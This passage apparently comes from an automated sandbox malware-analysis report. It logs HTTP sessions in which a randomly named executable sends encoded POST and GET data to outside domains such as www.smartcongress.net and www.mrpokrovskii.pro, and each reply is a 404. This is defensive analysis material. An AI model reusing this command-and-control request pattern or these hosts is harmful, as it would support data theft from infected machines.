                                                                                                                      Data Ascii: 4nJt=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm/a1VtFbkMTg6uvr2M3eNHHW6n6G9Q9xTKptm5V9uMG2R


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.649929146.88.233.115802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:10.523684025 CET648OUTPOST /11t3/ HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.smartcongress.net
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.smartcongress.net/11t3/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 4d 38 31 37 63 50 53 6b 41 34 39 6c 67 79 4a 49 68 67 51 44 70 78 45 6e 37 4c 48 51 6b 31 6b 61 37 72 77 6a 47 37 47 45 73 36 31 5a 49 37 4a 68 50 6d 45 72 46 62 78 47 30 6a 61 68 6c 39 44 58 61 4f 5a 41 54 53 54 34 38 4d 45 59 4d 79 59 62 68 42 71 44 73 5a 57 34 67 6c 67 51 41 56 72 6e 6e 41 73 64 7a 53 70 34 61 62 35 6a 6d 47 6f 2b 74 6f 78 76 79 53 79 37 49 55 30 55 7a 48 61 7a 55 46 72 5a 32 73 51 45 65 75 56 58 32 34 6e 34 65 50 51 64 78 35 49 70 56 6d 72 43 78 4a 44 79 54 79 65 4a 75 68 57 61 42 61 59 4e 56 52 64 64 58 4b 69 4e 51 4f 6c 67 3d 3d
                                                                                                                      Data Ascii: 4nJt=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PM817cPSkA49lgyJIhgQDpxEn7LHQk1ka7rwjG7GEs61ZI7JhPmErFbxG0jahl9DXaOZATST48MEYMyYbhBqDsZW4glgQAVrnnAsdzSp4ab5jmGo+toxvySy7IU0UzHazUFrZ2sQEeuVX24n4ePQdx5IpVmrCxJDyTyeJuhWaBaYNVRddXKiNQOlg==
                                                                                                                      Nov 26, 2024 11:18:11.782625914 CET380INHTTP/1.1 404 Not Found
                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                      content-length: 196
                                                                                                                      date: Tue, 26 Nov 2024 10:18:11 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-tuned-by: N0C
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.649938146.88.233.115802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:13.192737103 CET1661OUTPOST /11t3/ HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.smartcongress.net
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.smartcongress.net/11t3/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 36 4f 56 53 48 49 41 72 2b 2f 42 72 4f 52 33 50 33 65 66 61 5a 6c 48 46 7a 53 70 42 2f 50 55 38 70 59 55 50 64 6e 34 34 38 6c 67 79 49 49 68 6a 51 44 6f 68 45 6d 53 43 48 51 6f 50 6b 59 44 72 77 41 4f 37 42 32 55 36 67 4a 49 37 55 78 50 6e 4c 4c 46 4f 78 47 6b 76 61 68 56 39 44 58 61 4f 5a 44 37 53 55 70 38 4d 49 34 4d 31 66 62 68 4e 38 7a 73 31 57 35 49 54 67 52 30 76 72 30 2f 41 76 2b 62 53 71 4b 43 62 31 6a 6d 41 72 2b 74 4b 78 76 4f 4e 79 37 55 79 30 55 33 68 61 30 38 46 70 49 72 6e 4b 55 65 6b 50 42 33 64 35 50 65 75 52 70 78 47 43 4b 77 64 76 45 6f 31 4a 77 44 61 61 76 47 63 43 34 59 41 4e 66 39 72 62 49 71 63 6e 4d 46 47 38 49 45 76 64 2b 49 45 74 6f 4a 59 6d 6d 35 45 39 4e 6f 66 53 72 39 57 77 4e 4f 6f 78 4e 54 51 6b 47 6b 4e 61 6c 4b 6b 37 6d 76 33 56 56 30 72 38 7a 33 31 45 4f 6b 6f 76 6a 44 66 4b 7a 66 6d 4a 74 76 38 41 33 37 4a 2f 34 4a 34 32 58 6c 50 75 76 61 50 4c 76 4e 33 63 63 6f 4b 70 5a 70 5a 43 72 2b 50 46 2f 66 4a 6f 53 6f 38 6c [TRUNCATED]
                                                                                                                      Data Ascii: 4nJt=Mq/wbTVEdvZa6OVSHIAr+/BrOR3P3efaZlHFzSpB/PU8pYUPdn448lgyIIhjQDohEmSCHQoPkYDrwAO7B2U6gJI7UxPnLLFOxGkvahV9DXaOZD7SUp8MI4M1fbhN8zs1W5ITgR0vr0/Av+bSqKCb1jmAr+tKxvONy7Uy0U3ha08FpIrnKUekPB3d5PeuRpxGCKwdvEo1JwDaavGcC4YANf9rbIqcnMFG8IEvd+IEtoJYmm5E9NofSr9WwNOoxNTQkGkNalKk7mv3VV0r8z31EOkovjDfKzfmJtv8A37J/4J42XlPuvaPLvN3ccoKpZpZCr+PF/fJoSo8l2CFVInxCX8CsXv2IWUSCZycfl6QOFPcf78YPk9CLDZpqxalJUXoeqlWgn5VtmjXKw6BqO2LPYll2VGQerrnn5XdA0kIMXx5UNFrJwg4bfUtPQbu6OjFD6wCJ4lSGcpFOQcP8DTG4juKCnhko49mqT3EKuG2mDvjAqInM7FNCNC12LzLLXqhcdOFuXxyJstGZryFwspSYnYlUXpSbJiLCYMRWeoX2kSW5Vo6BvGoNW/3Vo/tJXxTC48FWVRV2z2y4tmJaS1ZbP9mg7GAs1nzhUi2oIgt+0x/x8kfZIVMOXzLLwxsHZho0PdnZxHMIHFdtHixQr5k/aD3Xi224S4LLSz4F4l1rzQHxLkc5RlmcbNDmuywdLoRSEYvCo6VReneMtV7aSlheooQnsIDHQE7bPgVVJKBeZBFCpFZ0PAlg/jIuD8mCyDQLJEiRHihcLHaB0dtw2Ah5G5p8OOl/AfqZUmSg/1bQSoKter4KhbKblHTHRRvAmZOpIvv30ybzUU4syIZ3cRe9jmVkYNICPDCkaHiaayocCoy42Fa4l2lxs7CHGscwZbfWaiuxef/8wkGLD/wnVIMELGfM/tzs+VNuPg1IoVJn7aklptseZrx28uqoD4rq2jKWTPGpkhnnhrECv5/jPI+drpcalOUxKcNvGsNYXo1D0Yo8Ri [TRUNCATED]
                                                                                                                      Nov 26, 2024 11:18:14.641567945 CET380INHTTP/1.1 404 Not Found
                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                      content-length: 196
                                                                                                                      date: Tue, 26 Nov 2024 10:18:14 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-tuned-by: N0C
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.649944146.88.233.115802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:15.846681118 CET366OUTGET /11t3/?4nJt=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01304IHNwj2Yod4wHZbXR5gNDbNQ3/FaK5QMq4IALVNsxgTOJYQtE8=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Nov 26, 2024 11:18:17.113609076 CET380INHTTP/1.1 404 Not Found
                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                      content-length: 196
                                                                                                                      date: Tue, 26 Nov 2024 10:18:16 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-tuned-by: N0C
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.649960194.85.61.76802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:23.164010048 CET621OUTPOST /2pji/ HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.mrpokrovskii.pro
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 56 49 42 6c 6e 71 72 58 31 36 62 45 45 2f 70 79 34 42 55 7a 34 37 4e 6f 6c 4c 73 43 68 45 6f 45 70 6b 39 66 74 65 76 62 67 78 38 66 5a 59 68 54 45 67 44 61 4f 5a 68 6b 59 42 62 4c 43 7a 61 6e 6c 38 77 36 51 79 51 56 37 44 52 72 75 76 59 53 39 33 4c 5a 2f 6d 68 39 63 64 53 6a 6a 36 51 66 55 4e 6e 72 4a 55 31 2b 56 56 70 31 57 73 71 30 44 4f 31 50 2f 49 72 6e 55 39 61 55 44 64 51 41 42 37 63 36 4f 2b 2f 2b 32 68 4b 4e 59 6e 4e 4d 35 41 57 59 6b 6a 41 6a 55 7a 50 66 2b 6a 57 6f 56 4f 49 69 2f 6d 43 51 55 6b 6b 33 66 58 39 74 76 4a 31 2b 38 66 50 75 7a 64 39 72 6e 57 31 78
                                                                                                                      Data Ascii: 4nJt=35Kg7n3KcwIOVIBlnqrX16bEE/py4BUz47NolLsChEoEpk9ftevbgx8fZYhTEgDaOZhkYBbLCzanl8w6QyQV7DRruvYS93LZ/mh9cdSjj6QfUNnrJU1+VVp1Wsq0DO1P/IrnU9aUDdQAB7c6O+/+2hKNYnNM5AWYkjAjUzPf+jWoVOIi/mCQUkk3fX9tvJ1+8fPuzd9rnW1x
                                                                                                                      Nov 26, 2024 11:18:24.529572964 CET691INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:24 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.649966194.85.61.76802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:25.834130049 CET645OUTPOST /2pji/ HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.mrpokrovskii.pro
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 41 45 71 41 35 66 72 71 62 62 6e 78 38 66 4d 6f 67 5a 4a 41 44 52 4f 5a 64 61 59 46 48 4c 43 7a 4f 6e 6c 2b 34 36 52 46 38 53 36 54 52 70 33 2f 59 51 6c 58 4c 5a 2f 6d 68 39 63 64 58 47 6a 38 34 66 56 38 58 72 49 31 31 39 4a 46 70 32 65 4d 71 30 49 75 31 55 2f 49 71 43 55 38 57 36 44 65 34 41 42 2f 59 36 4f 71 72 39 34 68 4b 4c 41 48 4d 6d 2b 56 4c 47 68 51 6b 69 4b 79 62 34 75 6a 71 59 5a 59 56 34 6a 56 43 7a 47 30 45 31 66 56 6c 66 76 70 31 55 2b 66 33 75 68 4b 78 4d 6f 69 51 53 4d 59 34 65 6a 41 59 77 46 63 48 6c 4e 76 41 7a 49 48 43 77 6b 51 3d 3d
                                                                                                                      Data Ascii: 4nJt=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRAEqA5frqbbnx8fMogZJADROZdaYFHLCzOnl+46RF8S6TRp3/YQlXLZ/mh9cdXGj84fV8XrI119JFp2eMq0Iu1U/IqCU8W6De4AB/Y6Oqr94hKLAHMm+VLGhQkiKyb4ujqYZYV4jVCzG0E1fVlfvp1U+f3uhKxMoiQSMY4ejAYwFcHlNvAzIHCwkQ==
                                                                                                                      Nov 26, 2024 11:18:27.154783964 CET691INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:26 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.649973194.85.61.76802444C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 26, 2024 11:18:28.505179882 CET1658OUTPOST /2pji/ HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.mrpokrovskii.pro
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Raw: 34 6e 4a 74 3d 33 35 4b 67 37 6e 33 4b 63 77 49 4f 48 5a 78 6c 6c 4e 2f 58 7a 61 62 48 61 50 70 79 32 68 55 33 34 36 78 6f 6c 4b 70 48 68 52 59 45 70 7a 78 66 74 37 62 62 6d 78 38 66 51 34 67 61 4a 41 44 4d 4f 64 78 65 59 46 4c 62 43 77 32 6e 6c 63 41 36 59 58 45 53 77 54 52 70 2f 66 59 56 39 33 4b 44 2f 6d 78 35 63 64 48 47 6a 38 34 66 56 2b 50 72 42 45 31 39 61 31 70 31 57 73 71 77 44 4f 30 61 2f 49 6a 2f 55 38 43 45 44 50 59 41 41 62 38 36 49 63 58 39 77 68 4b 4a 56 48 4d 2b 2b 56 50 6e 68 51 4a 54 4b 79 76 47 75 6b 43 59 63 50 6c 6a 68 6b 43 53 59 6c 68 56 46 30 42 49 6d 38 41 71 79 4e 33 45 75 5a 78 44 77 68 49 6b 49 63 6b 33 71 69 6c 31 48 50 44 72 4d 4b 46 73 46 56 54 55 37 31 49 2f 6a 4f 32 41 2b 35 53 2b 36 45 33 75 36 43 38 38 76 32 44 42 44 59 4f 2f 32 6f 33 4f 31 4f 67 70 70 37 2f 30 49 69 57 76 66 32 4d 74 6c 65 55 36 6e 6b 6c 4c 58 41 35 64 49 41 2f 4a 6e 7a 64 68 2b 61 71 48 4c 2b 39 42 38 59 78 50 64 47 49 6a 7a 58 59 65 31 35 6a 4f 56 55 41 47 59 38 75 48 2b 49 71 44 72 33 59 6a 68 [TRUNCATED]
                                                                                                                      Data Ascii: 4nJt=35Kg7n3KcwIOHZxllN/XzabHaPpy2hU346xolKpHhRYEpzxft7bbmx8fQ4gaJADMOdxeYFLbCw2nlcA6YXESwTRp/fYV93KD/mx5cdHGj84fV+PrBE19a1p1WsqwDO0a/Ij/U8CEDPYAAb86IcX9whKJVHM++VPnhQJTKyvGukCYcPljhkCSYlhVF0BIm8AqyN3EuZxDwhIkIck3qil1HPDrMKFsFVTU71I/jO2A+5S+6E3u6C88v2DBDYO/2o3O1Ogpp7/0IiWvf2MtleU6nklLXA5dIA/Jnzdh+aqHL+9B8YxPdGIjzXYe15jOVUAGY8uH+IqDr3YjhibBnm+66dYgQDQKVmQKYH25x750MkzYViINWnTdjF0jTB7oDqvKS6gtQaU1cpyhz3q80b0FkxR4sM14w6ElPpVtc7RzJD0uMlP4NFksYbKWxPJ45DNmEbR5h4USlIeyYE9M4LrYG3mefwUc6AhobXqvIgtXHevC/YbaCwV6fxcowHAPM3H6XwlTKX+y/LPK5RnlLYR96iNB0q+fxI5vT2mRQz6DJvCRxUr5297IbGf0Uhr5r/KzUIgRgBSYj7HvYzztXxC4WYgKVYHNhTsGLAsKm/otrNkAyPynRRhXsN4WWRLcyCr8Bj1oz9UWCtd/Ry/ISGPWnVr3t7sY1uNsWIJkX4Qkr6aUCwKrrr3TEzuOaegLCJUd8emc8rXMs9NFmIBIXEJpHN6Dcu3WyvV6fBNluCMM6bB8lcHICV02YzawgnSC2LkF5Dn92wMv03oWP6HrYN8YzkH/IwtXFnLTJK29Icc6EjdoVYGznUbb7oz8yObXmncMUOZCDQYwuNsbbWb72X63IwCY20b6U+xSDqHqeXYjoi4ZgOQQg2QUrXWXn5AxPH1okxfI5M5wKmeEPk3POCQInAHZ3nmbWIF13/AL2E8kBfh5CDgKjwWZ7MnreFuYvq7QVfGBsOm5eE89KCQnCkPGJIDtb2anQ1+Xgz0bZnW4JmjVVfM [TRUNCATED]
                                                                                                                      Nov 26, 2024 11:18:29.856307983 CET691INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:18:29 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 548
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


